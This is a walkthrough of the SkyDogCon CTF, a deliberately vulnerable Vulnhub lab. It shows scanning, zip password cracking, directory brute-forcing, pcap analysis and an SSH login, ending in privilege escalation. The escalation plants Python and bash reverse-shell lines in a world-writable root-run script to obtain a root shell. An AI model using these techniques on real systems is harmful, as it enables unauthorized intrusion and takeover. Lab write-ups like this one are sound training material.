Objective

From Vulnhub “The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services”.

Flags

The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533

  • Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
  • Flag #2 When do Androids Learn to Walk?
  • Flag #3 Who Can You Trust?
  • Flag #4 Who Doesn’t Love a Good Cocktail Party?
  • Flag #5 Another Day at the Office
  • Flag #6 Little Black Box

Walkthrough

The first thing I to do once the IP address is identified is to see what’s running.

root@Oak:~# nmap -A -p- 10.0.2.30 
 
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 19:47 EDT 
Nmap scan report for 10.0.2.30 
Host is up (0.00025s latency). 
Not shown: 65533 closed ports 
PORT STATE SERVICE VERSION 
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey: 
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA) 
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA) 
|_ 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA) 
80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 
| http-robots.txt: 252 disallowed entries (15 shown) 
| /search /sdch /groups /catalogs /catalogues /news /nwshp 
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl 
|_/addurl/image? /mail/ /pagead/ 
|_http-server-header: Apache/2.4.7 (Ubuntu) 
|_http-title: Site doesn't have a title (text/html). 
MAC Address: 08:00:27:EF:0B:15 (Oracle VirtualBox virtual NIC) 
Device type: general purpose 
Running: Linux 3.X|4.X 
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 
OS details: Linux 3.2 - 4.4 
Network Distance: 1 hop 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
 
TRACEROUTE 
HOP RTT ADDRESS 
1 0.25 ms 10.0.2.30 
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 12.73 seconds

Options Explained – nmap

  • -A = Aggressive scan options
  • -p- = Scan all 65535 ports

The clue for the first flag is "Home Sweet Home or (A Picture is Worth a Thousand Words)"

This clue had me thinking that the flag is contained within an image.

The landing page of the webservice on port 80 is the image of the SkyDogCon CTF. I used wget to pull the image and then explored the exif data with exiftool.

wget http://10.0.2.30/SkyDogCon_CTF.jpg
exiftool SkyDogCon_CTF.jpg

Sure enough flag 1 has been found.

XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}

Since the flags use an MD5 hash, I was curious if they could be hashed messages.

A quick trip to crackstation and my curiosity was validated. The first flag traslates to: Welcome Home

The 2nd flag clue is "When do Androids Learn to Walk?"

Ok, that one was pretty obvious, so a quick look at robots.text and the 2nd flag is found.

http://10.0.2.30/robots.txt
Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}

Flag 2 hash translates to Bots

Ok then, time for flag three.

The clue for the 3rd flag is a little more ambiguous. "Who Can You Trust?"

After using Burp to spider the the website I found the URL 10.0.2.30/Setec/

The folder contains a picture from the movie Sneakers and the words Too Many Secrets

TooManySecrets

I examined the image for hidden gems but came up empty. The source of the /Setec folder contains some commented java script. It appears to be the standard Google tracking script with a neat Easter egg.

var pageTracker = _gat._getTracker_Approved("NSA-Agent-Abbott"; AKA Darth Vader);

This is another reference to the movie Sneakers. James Earl Jones played the NSA agent Bernard Abbot and voiced Darth Vader.

The image displayed at http://10.0.2.30/Setec/ resides in the Astronomy folder.

I navigate to http://10.0.2.30/Setec/Astronomy/ and I see that it has indexing enabled. Inside the Astronomy folder is a zip file called Whistler.zip. I didn’t realize it yet but this is yet another reference to Sneakers.

I pulled down the zip file and noticed that it’s password protected. I used fcrackzip and rockyou.txt to crack it.

root@Oak:~/Downloads/skydogctf/Whistler# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u Whistler.zip 


PASSWORD FOUND!!!!: pw == yourmother

Options Explained – fcrackzip

  • -D = use a dictionary
  • -p = use string as initial password/file

Flag 3 has been found!

flag{1871a3c1da602bf471d3d76cc60cdb9b}

This flag translates to yourmother

Contained in the zip is a text file titled QuesttoFindCosmo.txt the text in the file is:

Time to break out those binoculars and start doing some OSINT

The clue for the 4th flag was "Who Doesn’t Love a Good Cocktail Party?" The clue didn’t help. This is where I was stumped. I reached out to @jamesbower for a clue. He mentioned that the CTF follows the movie Sneakers in chronological order. I had not seen Sneakers since the 90’s probably and didn’t remember most of the movie.

I rented Sneakers from Amazon and gave it a watch.

The scene that held the answer was painfully obvious. While I was watching the movie I had also managed to find a script online. I used the script to create a wordlist that I could then use with Dirb.

cewl --write fscipt.lst -m 3 http://127.0.0.1/fscript.html

Options Explained – cewl

  • –write = write the output to the file
  • -m = minimum word length

I copied the Sneakers script into a local file to run cewl from my localhost to improve performance.

At the same time dirb found the hidden folder with the next clue the scene that held the answer to find the flag came on.

The scene with the clue as described from the script:

They arrive a couple of hundred yards from a big, modern
	building.  Carl looks around through binoculars.  A flag
	flies out front.  A corporate sign:

				PlayTronics
				The Future of Toys

I entered http://10.0.2.30/PlayTronics/ into the browser and boom! Flag 4 was found.

flag{c07908a705c22922e6d416e0e1107d99}

I checked dirb and saw that it too had found the hidden folder.

root@Oak:~/Downloads/skydogctf# dirb http://10.0.2.30 fscipt.lst -w

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May  5 20:08:43 2016
URL_BASE: http://10.0.2.30/
WORDLIST_FILES: fscipt.lst
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 3739                                                          

---- Scanning URL: http://10.0.2.30/ ----
==> DIRECTORY: http://10.0.2.30/Setec/                                         
==> DIRECTORY: http://10.0.2.30/PlayTronics/                                   
                                                                               
---- Entering directory: http://10.0.2.30/Setec/ ----
==> DIRECTORY: http://10.0.2.30/Setec/Astronomy/                               
                                                                               
---- Entering directory: http://10.0.2.30/PlayTronics/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://10.0.2.30/Setec/Astronomy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu May  5 20:08:52 2016
DOWNLOADED: 14956 - FOUND: 0

Options Explained – dirb

  • -w = Don’t stop on WARNING messages.

Flag 4 translated to leroybrown

This was different than the rest of the flags. All the past flags referenced the clues used to find the flag. This one however was different.

I Googled Leroy Brown and Sneakers and came upon the karaoke scene where they sang Leroy Brown at the Dim Sum bar.

Inside the PlayTronics folder is a pcap file called companytraffic.pcap. The clue for the 5th flag is "Another Day at the Office" This clue didn’t help me too much.

I downloaded the file and explored it with WireShark. Most of the traffic was encrypted, but at the end of the pcap was some traffic sent over http in clear text. Upon further examination I realized that it contained an audio file.

I extracted the audiofile with tcpflow.

tcpflow -a -r companytraffic.pcap|

Options Explained – tcpflow

  • -a = do ALL post-processing.
  • -r = read packets from tcpdump pcap file

I then check the file with the file command:

root@Oak:~/Downloads/skydogctf/pcap# file 054.239.172.025.00080-192.168.002.223.35144-HTTPBODY-001.mpga
054.239.172.025.00080-192.168.002.223.35144-HTTPBODY-001.mpga: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

I listened to the file and I could hear Dr. Werner Brandes say "Hi, my name is Werner Brandes. My voice is my passport. Verify me." It was a recording from the movie.

I tried to use this string to find yet another hidden folder. I couldn’t find anything so I thought that this clue was telling me that I had to log into ssh. Especially since in the movie they were trying to get Dr. Brandes to say these words so they can gain access to a restricted area.

The previous flag said leroybrown and knowing that they sang Leroy Brown at the Dim Sum bar, I thought that scene would give me the clue to login to ssh.

During the karaoke scene, Liz used the alias Doris while she was seducing Dr. Brandes. I figured the password would be leroybown based on the previous flag. I then assumed the username would be Doris.

I was wrong. So then I figured that the username had to be related to Dr.Brandes. I tried several permutations of the username using Dr. Brandes name, then finally tried wernerbrandes with the password leroybrown. And access was granted.

root@Oak:~/Downloads/skydogctf# ssh wernerbrandes@10.0.2.30
wernerbrandes@10.0.2.30's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Tue May 3 23:18:05 EDT 2016

System load: 0.4 Processes: 96
 Usage of /: 13.3% of 17.34GB Users logged in: 0
 Memory usage: 21% IP address for eth0: 10.0.2.30
 Swap usage: 0%

Graph this data and manage this system at:
 https://landscape.canonical.com/

152 packages can be updated.
81 updates are security updates.

Last login: Tue May 3 23:18:08 2016 from 10.0.2.27
wernerbrandes@skydogctf:~$

Flag 5 found!

wernerbrandes@skydogctf:~$ ls
flag.txt
wernerbrandes@skydogctf:~$ cat flag.txt 
flag{82ce8d8f5745ff6849fa7af1473c9b35}

When I hit up crack station to crack this hash, I was surprised to discover that it had not been cracked. The clue for the last flag is "Little Black Box"

Now that I had access I knew that the next step was to get root.

I started by looking for files that were world writable and found one called sanitizer.py.

wernerbrandes@skydogctf:~$ find / -perm -0002 -type f -not -path "/proc*" -exec ls -la {} \; 2>/dev/null 
-rwxrwxrwx 1 root root 341 May  3 23:16 /lib/log/sanitizer.py
-rw-rw-rw- 1 root root 0 May  2 15:22 /sys/kernel/security/apparmor/.access

Options Explained – find

  • / = Start the search from /
  • -perm = All of the permission bits set for the file.
  • -0002 = Finds the w permission for what other users can do
  • -type = File is of type
  • -f = Regular file
  • -not = expr True if expr is false.
  • -path = File name matches shell pattern
  • “/proc” = Filtered out matching permissions from /proc
  • -exec {} \;= Runs the specified command on the selected files
  • 2>/dev/null = redirects stderr to the file /dev/null

Usually when a file like this is found, it is run via a cron job as root. I didn’t see that this file was called by any cron jobs, but the script deletes the contents of the /tmp directory. I created a test file and placed it in /tmp and a short time later, the file was gone. I knew this was my escalation point.

I decided that I wanted a reverse shell and use the python reverse shell from Pentest Monkey.

wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py 
#!/usr/bin/env python
#import os
#import sys
#try:
#    os.system('bash -i >& /dev/tcp/10.0.2.27/443 0>&1')

#except:
#    sys.exit()
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

I fired up a netcat listener and a reverse shell was born.

I now had root and the final flag.

root@Oak:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.27] from (UNKNOWN) [10.0.2.30] 51469
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
skydogctf
# cat /root/BlackBox/flag.txt
flag{b70b205c96270be6ced772112e7dd03f}

Congratulations!! Martin Bishop is a free man once again!  Go here to receive your reward.
/CongratulationsYouDidIt#

Options Explained – nc

  • -n = numeric-only IP addresses, no DNS
  • -l = listen mode, for inbound connects
  • -v = verbose
  • -p = local port number

The 6th flag didn’t yield any results from crackstation either but when I navigated to the hidden folder I was greeted with a video from the Karate Kid playing the song You’re the Best Around.

You're The Best Around

This CTF was pretty captivating. I really enjoyed the OSINT challenge mixed in. It was a nice change from the other boot2roots. I always get a thrill out of getting an opportunity to use new tools and learning new techniques. This CTF delivered and I look forward to the next SkyDogCon CTF.

A big thanks to @jamesbower and the @Vulnhub team.

 

Advertisements